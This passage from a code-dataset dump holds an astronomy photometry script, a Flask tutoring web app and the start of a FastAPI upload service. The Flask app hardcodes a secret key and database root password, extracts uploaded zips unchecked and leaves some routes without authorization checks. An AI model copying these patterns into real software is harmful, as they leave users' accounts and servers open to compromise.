0.01\n\n\n\n#####################\n ### PANDAS\n if obj['Phot'] == 'pandas':\n file = DEIMOS_RAW + '/Photometry/PANDAS/PANDAS_'+obj['Name2']+'.csv'\n pandas = ascii.read(file)\n \n pandas.rename_column('g', 'gmag')\n pandas.rename_column('i', 'rmag') # NEED TO TRANSFORM!!!\n pandas.rename_column('dg', 'gmag_err')\n pandas.rename_column('di', 'rmag_err')\n\n\n cpandas = SkyCoord(ra=pandas['RA']*u.degree, dec=pandas['Dec']*u.degree) \n cdeimos = SkyCoord(ra=allspec['RA']*u.degree, dec=allspec['DEC']*u.degree) \n\n idx, d2d, d3d = cdeimos.match_to_catalog_sky(cpandas) \n foo = np.arange(0,np.size(idx),1)\n\n mt = foo[d2d < 1.*u.arcsec]\n allspec['rmag_o'][mt] = pandas['rmag'][idx[d2d < 1.*u.arcsec]] \n allspec['gmag_o'][mt] = pandas['gmag'][idx[d2d < 1.*u.arcsec]] \n allspec['rmag_err'][mt] = 0.01\n allspec['gmag_err'][mt] = 0.01\n\n allspec['phot_source'][mt] = 'pandas'\n\n \n\n#####################\n ### MASSEY\n if obj['Phot'] == 'massey':\n file = DEIMOS_RAW + '/Photometry/other/massey_2007.fits'\n massey = Table.read(file)\n\n massey['V-R'] = massey['Vmag'] - massey['V-R'] # CREATE R-mag\n massey.rename_column('Vmag', 'gmag')\n massey.rename_column('V-R', 'rmag') \n# massey.rename_column('dg', 'gmag_err')\n# massey.rename_column('di', 'rmag_err')\n massey['RAJ2000'] = np.array(massey['RAJ2000'])\n massey['DEJ2000'] = np.array(massey['DEJ2000'])\n\n cmassey = SkyCoord(ra=massey['RAJ2000']*u.degree, dec=massey['DEJ2000']*u.degree) \n cdeimos = SkyCoord(ra=allspec['RA']*u.degree, dec=allspec['DEC']*u.degree) \n\n idx, d2d, d3d = cdeimos.match_to_catalog_sky(cmassey) \n foo = np.arange(0,np.size(idx),1)\n\n mt = foo[d2d < 1.*u.arcsec]\n allspec['rmag_o'][mt] = massey['rmag'][idx[d2d < 1.*u.arcsec]] \n allspec['gmag_o'][mt] = massey['gmag'][idx[d2d < 1.*u.arcsec]] \n allspec['rmag_err'][mt] = 0.01\n allspec['gmag_err'][mt] = 0.01\n\n \n\n\n\n # DETERMINE MV AND CONVERT CAT -> FEH\n m_miss_star = (allspec['rmag_o'] < 2) & (allspec['v_err'] > 0)\n print('PHOT: Matched {} stars, missing {} star targets'.format(np.size(mt),np.sum(m_miss_star)))\n\n allspec = calc_rproj(allspec,obj)\n allspec = calc_MV_star(allspec,obj)\n allspec = CaT_to_FeH(allspec)\n\n\n return allspec\n\n","repo_name":"marlageha/dmost","sub_path":"dmost/combine/dmost_photometry_gaia.py","file_name":"dmost_photometry_gaia.py","file_ext":"py","file_size_in_byte":18557,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"3246828476","text":"from flask import Flask, render_template, request, escape, redirect, url_for, session, flash\nfrom passlib.hash import sha256_crypt\nfrom datetime import datetime\nfrom flask_sqlalchemy import SQLAlchemy\nfrom werkzeug.utils import secure_filename\nimport os\nfrom random import randint\nimport zipfile\n\n\napp = Flask(__name__)\napp.secret_key = \"Tarang_is_secret_key\"\n\napp.config['SQLALCHEMY_DATABASE_URI'] = \"mysql+pymysql://root:vishu@127.0.0.1:3306/tarang\"\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\n\ndb = SQLAlchemy(app)\n\nclass Admin(db.Model):\n __tablename__= 'admin'\n id = db.Column(db.Integer, \n primary_key=True)\n name = db.Column(db.String(64), \n index=False, \n nullable=False)\n email = db.Column(db.String(80),\n index=True, \n unique=True, \n nullable=False)\n password = db.Column(db.String(128), \n nullable=False)\n phone = db.Column(db.Integer(),\n nullable=False)\n remember_token = db.Column(db.String(128), \n nullable=True)\n updated_at = db.Column(db.DateTime, \n default=datetime.now)\n created_at = db.Column(db.DateTime,\n default=datetime.now)\n\n def __init__(self, name, email, password, phone, remember_token=None):\n self.name = name\n self.email = email\n self.password = password\n self.phone = phone\n\n def __repr__(self):\n return '' % self.email\n\n\nclass Users(db.Model):\n __tablename__= 'users'\n id = db.Column(db.Integer, \n primary_key=True)\n name = db.Column(db.String(64), \n index=False, \n nullable=False)\n email = db.Column(db.String(80),\n index=True, \n unique=True, \n nullable=False)\n password = db.Column(db.String(128), \n nullable=False)\n phone = db.Column(db.Integer(),\n nullable=False)\n photo = db.Column(db.String(128), \n nullable=True)\n year = db.Column(db.String(40),\n nullable=True)\n teachers = db.Column(db.String(128), \n nullable=True)\n email_verified = db.Column(db.SmallInteger(),\n default=0)\n admin_verified = db.Column(db.SmallInteger(),\n default=0)\n google_provider_id = db.Column(db.String(128), \n nullable=True)\n facebook_provider_id = db.Column(db.String(128), \n nullable=True)\n batch_ids = db.Column(db.String(128), \n nullable=True)\n remember_token = db.Column(db.String(128), \n nullable=True)\n updated_at = db.Column(db.DateTime, \n default=datetime.now)\n created_at = db.Column(db.DateTime,\n default=datetime.now)\n\n def __init__(self, name, email, password, phone, year=None, google_provider_id=None,\n facebook_provider_id=None, batch_ids=None, remember_token=None):\n self.name = name\n self.email = email\n self.password = password\n self.phone = phone\n if year:\n self.year=year\n if(google_provider_id):\n self.google_provider_id = google_provider_id\n if(facebook_provider_id):\n self.facebook_provider_id = facebook_provider_id\n if(batch_ids):\n self.batch_ids = batch_ids\n if(remember_token):\n self.remember_token = remember_token\n\n def __repr__(self):\n return '' % self.email\n\n\nclass Lecturers(db.Model):\n __tablename__= 'lecturers'\n id = db.Column(db.Integer, \n primary_key=True)\n name = db.Column(db.String(64), \n index=False, \n nullable=False)\n email = db.Column(db.String(80),\n index=True, \n unique=True, \n nullable=False)\n password = db.Column(db.String(128), \n nullable=False)\n phone = db.Column(db.Integer(),\n nullable=False)\n photo = db.Column(db.String(128), \n nullable=True)\n designation = db.Column(db.String(128),\n nullable=True)\n education = db.Column(db.String(128),\n nullable=True)\n skills = db.Column(db.String(255),\n nullable=True)\n about = db.Column(db.String(1024),\n nullable=True)\n experience = db.Column(db.String(1024),\n nullable=True)\n achievements = db.Column(db.String(1024),\n nullable=True)\n students_request = db.Column(db.String(128),\n nullable=True)\n linkedin = db.Column(db.String(255),\n nullable=True)\n github = db.Column(db.String(255),\n nullable=True)\n youtube = db.Column(db.String(255),\n nullable=True)\n email_verified = db.Column(db.SmallInteger(),\n default=0)\n google_provider_id = db.Column(db.String(128), \n nullable=True)\n facebook_provider_id = db.Column(db.String(128), \n nullable=True)\n batch_ids = db.Column(db.String(128), \n nullable=True)\n remember_token = db.Column(db.String(128), \n nullable=True)\n updated_at = db.Column(db.DateTime, \n default=datetime.now)\n created_at = db.Column(db.DateTime,\n default=datetime.now)\n\n def __init__(self, name, email, password, phone, designation, \n education, google_provider_id=None, facebook_provider_id=None):\n self.name = name\n self.email = email\n self.password = password\n self.phone = phone\n self.designation = designation\n self.education = education\n if(google_provider_id):\n self.google_provider_id = google_provider_id\n if(facebook_provider_id):\n self.facebook_provider_id = facebook_provider_id\n\n def __repr__(self):\n return '' % self.email\n\n\n\nclass Assignments(db.Model):\n __tablename__= 'assignments'\n id = db.Column(db.Integer, \n primary_key=True)\n lecturer_id = db.Column(db.Integer,\n nullable=False)\n topic_name = db.Column(db.String(255), \n index=False, \n nullable=False)\n path = db.Column(db.String(128), \n nullable=False)\n updated_at = db.Column(db.DateTime, \n default=datetime.now)\n created_at = db.Column(db.DateTime,\n default=datetime.now)\n\n def __init__(self, lecturer_id, topic_name, path):\n self.lecturer_id = lecturer_id\n self.topic_name = topic_name\n self.path = path\n\n def __repr__(self):\n return '' % self.path\n\n\n\n\ndef create_user(req: 'flask_request') -> bool:\n try:\n name = str(req.form['name'])\n email = str(req.form['email'])\n password = str(sha256_crypt.hash(req.form['psw']))\n phone = int(req.form['phone'])\n year = str(req.form['year'])\n if year != \"\":\n user = Users(name,email,password,phone,year)\n else:\n user = Users(name,email,password,phone)\n db.session.add(user)\n db.session.commit()\n return True \n\n except Exception:\n return False\n\n\ndef create_lecturer(req: 'flask_request') -> bool:\n try:\n name = str(req.form['name'])\n email = str(req.form['email'])\n password = str(sha256_crypt.hash(req.form['psw']))\n phone = int(req.form['phone'])\n designation = str(req.form['designation'])\n education = str(req.form['education'])\n lecturer = Lecturers(name,email,password,phone,designation,education)\n db.session.add(lecturer)\n db.session.commit()\n return True \n except Exception:\n return False\n\n\n\n@app.route('/update')\ndef update_user() -> bool:\n try:\n update = Users.query.filter_by(email=\"zxcv@gmail.com\").first()\n update.name = \"zxcv\"\n db.session.commit()\n return 'True'\n except Exception:\n return 'False'\n\n\ndef login_credential_check(req: 'flask_request') -> bool:\n try:\n username = str(req.form['username'])\n password = str(req.form['pass'])\n user = Users.query.filter_by(email=username).first()\n if user.email == username and sha256_crypt.verify(password, user.password):\n session['tarang_username'] = user.email\n session['student_id'] = user.id\n return True\n else:\n return False\n except Exception:\n return False\n\n\ndef lecturer_login_credential_check(req: 'flask_request') -> bool:\n try:\n username = str(req.form['username'])\n password = str(req.form['pass'])\n lecturer = Lecturers.query.filter_by(email=username).first()\n if lecturer.email == username and sha256_crypt.verify(password, lecturer.password):\n session['lecturer_username'] = lecturer.email\n session['lecturer_id'] = lecturer.id\n return True\n else:\n return False\n except Exception as e:\n raise e\n\n\n# student section\n\n@app.route('/')\n@app.route('/login')\ndef students_login() -> 'html':\n if 'tarang_username' in session:\n return redirect(url_for('dashboard'))\n return render_template('login.html', the_title='Students Login - Tarang')\n\n\n@app.route('/login_success', methods = ['POST', 'GET'])\ndef login_success():\n if request.method == 'POST':\n user = login_credential_check(request)\n if user != False:\n return redirect(url_for('dashboard'))\n else:\n flash('Login credentials do not match')\n return redirect('/login')\n\n return redirect('/login')\n\n\n\n@app.route('/signup')\ndef students_signup() -> 'html':\n return render_template('signup.html',\n the_title='Students Sign Up - Tarang')\n\n\n@app.route('/signup_success', methods = ['POST', 'GET'])\ndef signup_success():\n if request.method == 'POST':\n boolean = create_user(request)\n if boolean == True:\n flash('Successfully sign up, you can login now')\n return redirect('/login')\n else:\n flash('Error occurred ! Please try again')\n return redirect('/signup')\n\n\n@app.route('/logout')\ndef logout():\n session.pop('tarang_username', None)\n session.pop('student_id', None)\n return redirect('login')\n \n\n\n@app.route('/ForgotPassword')\ndef ForgotPassword() -> 'html':\n return render_template('ForgotPassword.html',\n the_title='Forgot Password - Tarang')\n\n@app.route('/dashboard')\ndef dashboard() -> 'html':\n if 'tarang_username' not in session:\n return redirect('/login')\n else:\n user = Users.query.filter_by(email=session['tarang_username']).first()\n return render_template('dashboard/index.html',\n the_title='Students Dashboard - Tarang',\n user=user)\n\n\n@app.route('/notes')\ndef notes() -> 'html':\n if 'tarang_username' not in session:\n return redirect('/login')\n else:\n user = Users.query.filter_by(email=session['tarang_username']).first()\n lecturers = Lecturers.query.all()\n notes = Assignments.query.all()\n request_accepted = [int(i) for i in user.teachers.split(',')]\n return render_template('dashboard/notes.html',\n the_title='Notes - Tarang',\n user=user,\n lecturers=lecturers,\n notes=notes,\n request_accepted=request_accepted)\n\n@app.route('/notes/')\ndef lecturer_notes(id) -> 'html':\n if 'tarang_username' not in session:\n return redirect('/login')\n else:\n user = Users.query.filter_by(email=session['tarang_username']).first()\n lecturers = Lecturers.query.all()\n notes = Assignments.query.filter_by(lecturer_id=id).all()\n request_accepted = [int(i) for i in user.teachers.split(',')]\n return render_template('dashboard/lecturer_notes.html',\n the_title='Notes - Tarang',\n user=user,\n lecturers=lecturers,\n notes=notes,\n lecturer_id=int(id),\n request_accepted=request_accepted)\n\n\n\n@app.route('/note/')\ndef note(id) -> 'html':\n if 'tarang_username' not in session:\n return redirect('/login')\n else:\n user = Users.query.filter_by(email=session['tarang_username']).first()\n assignment = Assignments.query.filter_by(id=id).first()\n lecturer = Lecturers.query.filter_by(id=assignment.lecturer_id).first()\n request_accepted = [int(i) for i in user.teachers.split(',')]\n return render_template('dashboard/note.html',\n the_title='Note - Tarang',\n user=user,\n id=int(id),\n assignment=assignment,\n lecturer=lecturer,\n request_accepted=request_accepted)\n\n\n\n@app.route('/tests')\ndef tests() -> 'html':\n if 'tarang_username' not in session:\n return redirect('/login')\n else:\n user = Users.query.filter_by(email=session['tarang_username']).first()\n lecturers = Lecturers.query.all()\n tests = Assignments.query.all()\n request_accepted = [int(i) for i in user.teachers.split(',')]\n return render_template('dashboard/tests.html',\n the_title='Tests - Tarang',\n user=user,\n lecturers=lecturers,\n tests=tests,\n request_accepted=request_accepted)\n\n\n\n@app.route('/tests/')\ndef lecturer_tests(id) -> 'html':\n if 'tarang_username' not in session:\n return redirect('/login')\n else:\n user = Users.query.filter_by(email=session['tarang_username']).first()\n lecturers = Lecturers.query.all()\n tests = Assignments.query.filter_by(lecturer_id=id).all()\n request_accepted = [int(i) for i in user.teachers.split(',')]\n return render_template('dashboard/lecturer_tests.html',\n the_title='Notes - Tarang',\n user=user,\n lecturers=lecturers,\n tests=tests,\n lecturer_id=int(id),\n request_accepted=request_accepted)\n\n\n\n@app.route('/test/')\ndef test(id) -> 'html':\n if 'tarang_username' not in session:\n return redirect('/login')\n else:\n user = Users.query.filter_by(email=session['tarang_username']).first()\n assignment = Assignments.query.filter_by(id=id).first()\n lecturer = Lecturers.query.filter_by(id=assignment.lecturer_id).first()\n request_accepted = [int(i) for i in user.teachers.split(',')]\n return render_template('dashboard/test.html',\n the_title='Test - Tarang',\n user=user,\n id=int(id),\n assignment=assignment,\n lecturer=lecturer,\n request_accepted=request_accepted)\n\n\n\n@app.route('/lecturers')\ndef lecturers() -> 'html':\n if 'tarang_username' not in session:\n return redirect('/login')\n else:\n user = Users.query.filter_by(email=session['tarang_username']).first()\n lecturers = Lecturers.query.all()\n request_accepted = [int(i) for i in user.teachers.split(',')]\n request_sent = []\n for lecturer in lecturers:\n if lecturer.students_request != None and user.id in [int(i) for i in lecturer.students_request.split(',')]:\n request_sent.append(lecturer.id)\n\n return render_template('dashboard/teachers.html',\n the_title='Lecturers - Tarang',\n user=user,\n lecturers=lecturers,\n request_accepted=request_accepted,\n request_sent=request_sent)\n\n\n@app.route('/lecturer_info/')\ndef lecturer_info(id) -> 'html':\n if 'tarang_username' not in session:\n return redirect('/login')\n else:\n user = Users.query.filter_by(email=session['tarang_username']).first()\n lecturers = Lecturers.query.all()\n request_accepted = [int(i) for i in user.teachers.split(',')]\n request_sent = []\n for lect in lecturers:\n if lect.students_request != None and user.id in [int(i) for i in lect.students_request.split(',')]:\n request_sent.append(lect.id)\n\n lecturer = Lecturers.query.filter_by(id=id).first() \n return render_template('dashboard/teacher_info.html',\n the_title='Lecturer - Tarang',\n user=user,\n lecturers=lecturers,\n lecturer=lecturer,\n request_accepted=request_accepted,\n request_sent=request_sent)\n\n\n@app.route('/send_request/')\ndef send_request(id) -> 'html':\n if 'tarang_username' not in session:\n return redirect('/login')\n else:\n lecturer = Lecturers.query.filter_by(id=id).first()\n if lecturer.students_request != None:\n students_request = [int(i) for i in lecturer.students_request.split(',')]\n students_request.append(session['student_id'])\n students_request = ','.join(str(i) for i in students_request)\n lecturer.students_request = students_request\n db.session.commit()\n else:\n lecturer.students_request = str(session['student_id'])\n db.session.commit()\n\n return redirect('/lecturers')\n\n\n@app.route('/cancel_request/')\ndef cancel_request(id) -> 'html':\n if 'tarang_username' not in session:\n return redirect('/login')\n else:\n lecturer = Lecturers.query.filter_by(id=id).first()\n\n students_request = [int(i) for i in lecturer.students_request.split(',')]\n students_request.remove(session['student_id'])\n if students_request != []:\n students_request = ','.join(str(i) for i in students_request)\n lecturer.students_request = students_request\n db.session.commit()\n else:\n lecturer.students_request = None\n db.session.commit()\n\n return redirect('/lecturers')\n\n\n\n@app.route('/results')\ndef results() -> 'html':\n if 'tarang_username' not in session:\n return redirect('/login')\n else:\n user = Users.query.filter_by(email=session['tarang_username']).first()\n return render_template('dashboard/results.html',\n the_title='Test Results - Tarang',\n user=user)\n\n\n\n# Lecturer section\n@app.route('/lecturer')\n@app.route('/lecturer/login')\ndef lecturer_login() -> 'html':\n if 'lecturer_username' in session:\n return redirect(url_for('lecturer_dashboard'))\n return render_template('lecturer_login.html', the_title='Lecturers Login - Tarang')\n\n\n@app.route('/lecturer_login_success', methods = ['POST', 'GET'])\ndef lecturer_login_success():\n if request.method == 'POST':\n lecturer = lecturer_login_credential_check(request)\n if lecturer == True:\n return redirect(url_for('lecturer_dashboard'))\n else:\n flash('Login credentials do not match')\n return redirect('/lecturer/login')\n\n return redirect('/lecturer/login')\n\n\n\n@app.route('/lecturer/signup')\ndef lecturer_signup() -> 'html':\n return render_template('lecturer_signup.html',\n the_title='Lecturers Sign Up - Tarang')\n\n\n@app.route('/lecturer/signup_success', methods = ['POST', 'GET'])\ndef lecturer_signup_success():\n if request.method == 'POST':\n boolean = create_lecturer(request)\n if boolean == True:\n flash('Successfully sign up, you can login now')\n return redirect('/lecturer/login')\n else:\n flash('Error occurred ! Please try again')\n return redirect('/lecturer/signup')\n\n\n@app.route('/lecturer/logout')\ndef lecturer_logout():\n session.pop('lecturer_username', None)\n session.pop('lecturer_id', None)\n return redirect('/lecturer/login')\n \n\n\n@app.route('/lecturer/ForgotPassword')\ndef LecturerForgotPassword() -> 'html':\n return render_template('LecturerForgotPassword.html',\n the_title='Forgot Password - Tarang')\n\n\n@app.route('/lecturer/dashboard')\ndef lecturer_dashboard() -> 'html':\n if 'lecturer_username' not in session:\n return redirect('/lecturer/login')\n else:\n lecturer = Lecturers.query.filter_by(email=session['lecturer_username']).first()\n return render_template('dashboard/lecturer_index.html',\n the_title='Lecturer Dashboard - Tarang',\n lecturer=lecturer)\n\n\n\n@app.route('/lecturer/edit_dashboard')\ndef lecturer_edit_dashboard() -> 'html':\n if 'lecturer_username' not in session:\n return redirect('/lecturer/login')\n else:\n lecturer = Lecturers.query.filter_by(email=session['lecturer_username']).first()\n return render_template('dashboard/lecturer_edit_dashboard.html',\n the_title='Edit - Tarang',\n lecturer=lecturer)\n\n\n@app.route('/lecturer/edit_dashboard_success', methods = ['GET','POST'])\ndef lecturer_edit_dashboard_success() -> 'html':\n if 'lecturer_username' not in session:\n return redirect('/lecturer/login')\n elif request.method == 'POST':\n try:\n lecturer = Lecturers.query.filter_by(email=session['lecturer_username']).first()\n lecturer.name = request.form['name']\n lecturer.phone = request.form['phone']\n lecturer.designation = request.form['designation']\n lecturer.education = request.form['education']\n if request.form['skills'] != None:\n lecturer.skills = request.form['skills']\n if request.form['about'] != None: \n lecturer.about = request.form['about']\n if request.form['experience'] != None:\n lecturer.experience = request.form['experience']\n if request.form['achievements'] != None:\n lecturer.achievements = request.form['achievements']\n if request.form['linkedin'] != None:\n lecturer.linkedin = request.form['linkedin']\n if request.form['github'] != None:\n lecturer.github = request.form['github']\n if request.form['youtube'] != None:\n lecturer.youtube = request.form['youtube']\n db.session.commit()\n return redirect('/lecturer/dashboard')\n except Exception:\n raise redirect('/lecturer/dashboard')\n\n\n\n@app.route('/lecturer/assignments')\ndef lecturer_assignments() -> 'html':\n if 'lecturer_username' not in session:\n return redirect('/lecturer/login')\n else:\n lecturer = Lecturers.query.filter_by(email=session['lecturer_username']).first()\n assignments = Assignments.query.filter_by(lecturer_id=lecturer.id).all()\n return render_template('dashboard/lecturer_assignments.html',\n the_title='Lecturer Assignments - Tarang',\n lecturer=lecturer,\n assignments=assignments)\n\n\n\n@app.route('/lecturer/create_assignment')\ndef lecturer_create_assignment() -> 'html':\n if 'lecturer_username' not in session:\n return redirect('/lecturer/login')\n else:\n lecturer = Lecturers.query.filter_by(email=session['lecturer_username']).first()\n return render_template('dashboard/create_assignment.html',\n the_title='Create Assignments - Tarang',\n lecturer=lecturer)\n\n\n@app.route('/lecturer/create_assignment_success', methods = ['POST', 'GET'])\ndef lecturer_create_assignment_success() -> 'html':\n if 'lecturer_username' not in session:\n return redirect('/lecturer/login')\n elif request.method == 'POST':\n try:\n directory = str(randint(1000000000, 9999999999))\n parent_dir = \"./static/uploads\"\n path = os.path.join(parent_dir, directory)\n os.mkdir(path, 0o777)\n app.config['UPLOAD_FOLDER'] = path\n file = request.files['zip_file']\n file_name = secure_filename(file.filename)\n filename = os.path.join(app.config['UPLOAD_FOLDER'], file_name)\n file.save(filename)\n with zipfile.ZipFile(filename, 'r') as zip_ref:\n zip_ref.extractall(path)\n\n lecturer_id = request.form['lecturer_id']\n topic_name = str(request.form['topic_name'])\n path = \"uploads/\" + directory + \"/\" + file_name.split('.')[0]\n assignment = Assignments(lecturer_id,topic_name,path)\n db.session.add(assignment)\n db.session.commit()\n flash('Successfully created a assignment')\n return redirect('/lecturer/assignments')\n except Exception:\n flash('Error occurred ! Please try again')\n return redirect('/lecturer/create_assignment')\n else:\n flash('Error occurred ! Please try again')\n return redirect('/lecturer/create_assignment')\n\n\n@app.route('/lecturer/edit_assignment/')\ndef lecturer_edit_assignment(id) -> 'html':\n if 'lecturer_username' not in session:\n return redirect('/lecturer/login')\n else:\n assignment = Assignments.query.filter_by(id=id).first()\n return render_template('dashboard/edit_assignment.html',\n the_title='Create Assignments - Tarang',\n assignment=assignment)\n\n\n\n@app.route('/lecturer/edit_assignment_success', methods = ['POST', 'GET'])\ndef lecturer_edit_assignment_success() -> 'html':\n if 'lecturer_username' not in session:\n return redirect('/lecturer/login')\n elif request.method == 'POST':\n try: \n update_assignment = Assignments.query.filter_by(id=request.form['assignment_id']).first()\n update_assignment.topic_name = request.form['topic_name']\n db.session.commit() \n return redirect('/lecturer/assignments')\n except Exception:\n return redirect('/lecturer/assignments') \n\n\n@app.route('/lecturer/delete_assignment/')\ndef lecturer_delete_assignment(id) -> 'html':\n if 'lecturer_username' not in session:\n return redirect('/lecturer/login')\n else:\n try:\n assignment = Assignments.query.filter_by(id=id).first()\n db.session.delete(assignment)\n db.session.commit()\n return redirect('/lecturer/assignments')\n except Exception:\n return redirect('/lecturer/assignments')\n\n\n@app.route('/lecturer/students')\ndef lecturer_students() -> 'html':\n if 'lecturer_username' not in session:\n return redirect('/lecturer/login')\n else:\n lecturer = Lecturers.query.filter_by(email=session['lecturer_username']).first()\n students = Users.query.all()\n students_id = []\n for student in students:\n if student.teachers != None and lecturer.id in [int(i) for i in student.teachers.split(',')]:\n students_id.append(student.id)\n\n return render_template('dashboard/lecturer_students.html',\n the_title='All Students - Tarang',\n lecturer=lecturer,\n students=students,\n students_id=students_id)\n\n\n\n@app.route('/lecturer/student_remove/')\ndef lecturer_student_remove(id)-> 'html':\n if 'lecturer_username' not in session:\n return redirect('/lecturer/login')\n else:\n student = Users.query.filter_by(id=id).first()\n teachers_list = list(set([int(i) for i in student.teachers.split(',')]))\n teachers_list.remove(session['lecturer_id'])\n if teachers_list:\n teachers_str = ','.join(str(i) for i in teachers_list)\n student.teachers = teachers_str\n db.session.commit()\n else:\n student.teachers = None\n db.session.commit()\n return redirect('/lecturer/students')\n\n\n\n\n@app.route('/lecturer/studentsrequest')\ndef lecturer_studentsrequest() -> 'html':\n if 'lecturer_username' not in session:\n return redirect('/lecturer/login')\n else:\n lecturer = Lecturers.query.filter_by(email=session['lecturer_username']).first() \n students = Users.query.all()\n students_request = []\n if lecturer.students_request:\n students_request = list(set([int(i) for i in lecturer.students_request.split(',')]))\n return render_template('dashboard/lecturer_studentsrequest.html',\n the_title='New Students Request - Tarang',\n lecturer=lecturer,\n students=students,\n students_request=students_request)\n\n\n@app.route('/lecturer/student_request_accept/')\ndef lecturer_student_request_accept(id)-> 'html':\n if 'lecturer_username' not in session:\n return redirect('/lecturer/login')\n else:\n student = Users.query.filter_by(id=id).first()\n lecturer = Lecturers.query.filter_by(id=session['lecturer_id']).first()\n students_request = list(set([int(i) for i in lecturer.students_request.split(',')])) \n students_request.remove(int(id))\n if students_request:\n students_request_str = ','.join(str(i) for i in students_request)\n lecturer.students_request = students_request_str\n db.session.commit()\n else:\n lecturer.students_request = None\n db.session.commit()\n\n if student.teachers:\n teachers_list = list(set([int(i) for i in student.teachers.split(',')]))\n teachers_list.append(lecturer.id)\n teachers_str = ','.join(str(i) for i in teachers_list)\n student.teachers = teachers_str\n db.session.commit()\n else:\n student.teachers = str(lecturer.id)\n db.session.commit()\n\n return redirect('/lecturer/studentsrequest')\n\n\n\n@app.route('/lecturer/student_request_deny/')\ndef lecturer_student_request_deny(id)-> 'html':\n if 'lecturer_username' not in session:\n return redirect('/lecturer/login')\n else:\n lecturer = Lecturers.query.filter_by(id=session['lecturer_id']).first()\n students_request = list(set([int(i) for i in lecturer.students_request.split(',')])) \n students_request.remove(int(id))\n if students_request:\n students_request_str = ','.join(str(i) for i in students_request)\n lecturer.students_request = students_request_str\n db.session.commit()\n else:\n lecturer.students_request = None\n db.session.commit()\n return redirect('/lecturer/studentsrequest')\n\n\n\n@app.route('/lecturer/results')\ndef lecturer_results() -> 'html':\n if 'lecturer_username' not in session:\n return redirect('/lecturer/login')\n else:\n lecturer = Lecturers.query.filter_by(email=session['lecturer_username']).first()\n return render_template('dashboard/lecturer_results.html',\n the_title='Students Results- Tarang',\n lecturer=lecturer)\n\n\n\n\nif __name__ == '__main__':\n app.run()\n","repo_name":"vda4117/tarang","sub_path":"tarang/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":31352,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"5602719712","text":"from fastapi import FastAPI, UploadFile, File, Request\nfrom fastapi.templating import Jinja2Templates\nfrom pydantic import BaseModel\nimport sqlite3\nimport datetime\nfrom starlette.responses import FileResponse\nfrom starlette.staticfiles import StaticFiles\nfrom pytz import timezone\nfrom PIL import Image\nimport io\nimport uuid\nimport os\n\n\nTIME_FORMAT = \"%Y-%m-%d_%H:%M:%S\"\nKST = timezone(\"Asia/Seoul\")\n\n\nclass Item(BaseModel):\n cam_id: int\n x: float\n y: float\n z: float\n w: float\n\n\ndef get_image_time() -> str:\n conn = sqlite3.connect(\"database.db\")\n c = conn.cursor()\n c.execute(\"SELECT * FROM image_table ORDER BY id DESC LIMIT 1\")\n result = c.fetchone()\n conn.close()\n\n image_dict = dict(zip([x[0] for x in c.description], result))\n\n return image_dict[\"path\"], image_dict[\"time\"]\n\n\napp = FastAPI()\napp.mount(\"/static\", StaticFiles(directory=\"static\"))\ntemplates = Jinja2Templates(directory=\"templates\")\n\n\n@app.get(\"/\")\nasync def read_index(request: Request):\n image_path, time = get_image_time()\n time = time.replace(\"_\", \" \")\n\n return templates.TemplateResponse(\n \"index.html\",\n {\"request\": request, \"image\": image_path, \"time\": time},\n )\n\n\n@app.get(\"/HRI\")\nasync def HRI():\n return FileResponse(\"templates/HRI.html\")\n\n\n@app.get(\"/quit\")\ndef quit():\n \"\"\"\n When get to /quit, update the current time in quit_table in database.db.\n \"\"\"\n conn = sqlite3.connect(\"database.db\")\n c = conn.cursor()\n c.execute(\n \"INSERT INTO quit_table (time) VALUES (?)\",\n (datetime.datetime.now(KST).strftime(TIME_FORMAT),),\n )\n conn.commit()\n conn.close()\n\n return {\"message\": \"success\"}\n\n\n@app.get(\"/get_quit\")\ndef get_quit():\n conn = sqlite3.connect(\"database.db\")\n c = conn.cursor()\n c.execute(\"SELECT * FROM quit_table ORDER BY id DESC LIMIT 1\")\n result = c.fetchone()\n conn.close()\n\n quit_dict = dict(zip([x[0] for x in c.description], result))\n\n return quit_dict\n\n\n@app.get(\"/arrive\")\ndef arrive():\n \"\"\"\n When get to /quit, update the current time in quit_table in database.db.\n \"\"\"\n conn = sqlite3.connect(\"database.db\")\n c = conn.cursor()\n c.execute(\n \"INSERT INTO arrive_table (time) VALUES (?)\",\n (datetime.datetime.now(KST).strftime(TIME_FORMAT),),\n )\n conn.commit()\n conn.close()\n\n return {\"message\": \"success\"}\n\n\n@app.get(\"/get_arrive\")\ndef get_arrive():\n conn = sqlite3.connect(\"database.db\")\n c = conn.cursor()\n c.execute(\"SELECT * FROM arrive_table ORDER BY id DESC LIMIT 1\")\n result = c.fetchone()\n conn.close()\n\n quit_dict = dict(zip([x[0] for x in c.description], result))\n\n return quit_dict\n\n\n@app.post(\"/upload_dest\")\ndef upload_dest(item: Item):\n \"\"\"\n When you post to /upload_dest, it receives the json data\n and inserts the json data into the dest_table in database.db.\n \"\"\"\n conn = sqlite3.connect(\"database.db\")\n c = conn.cursor()\n c.execute(\n \"INSERT INTO dest_table (cam_id, x, y, z, w, time) VALUES (?, ?, ?, ?, ?, ?)\", # noqa: E501\n (\n item.cam_id,\n item.x,\n item.y,\n item.z,\n item.w,\n datetime.datetime.now(KST).strftime(TIME_FORMAT),\n ),\n )\n conn.commit()\n conn.close()\n return {\"message\": \"success\"}\n\n\n@app.get(\"/get_dest\")\ndef get_dest():\n conn = sqlite3.connect(\"database.db\")\n c = conn.cursor()\n c.execute(\"SELECT * FROM dest_table ORDER BY id DESC LIMIT 1\")\n result = c.fetchone()\n conn.close()\n\n dest_dict = dict(zip([x[0] for x in c.description], result))\n\n return dest_dict\n\n\n@app.post(\"/upload_image\")\nasync def upload_image(image: UploadFile = File(...)):\n img = Image.open(io.BytesIO(await image.read()))\n\n img_name = str(uuid.uuid4()) + \".jpg\"\n img_path = os.path.join(\"static\", \"images\", \"fall\", img_name)\n\n # save img to img_path\n img.save(img_path)\n\n conn = sqlite3.connect(\"database.db\")\n c = conn.cursor()\n c.execute(\n \"INSERT INTO image_table (name, path, time) VALUES (?, ?, ?)\", # noqa: E501\n (\n img_name,\n img_path,\n datetime.datetime.now(KST).strftime(TIME_FORMAT),\n ),\n )\n conn.commit()\n conn.close()\n\n return {\"message\": \"success\"}\n\n\n@app.get(\"/HRI_RETURN\")\nasync def HRI_RETURN():\n return 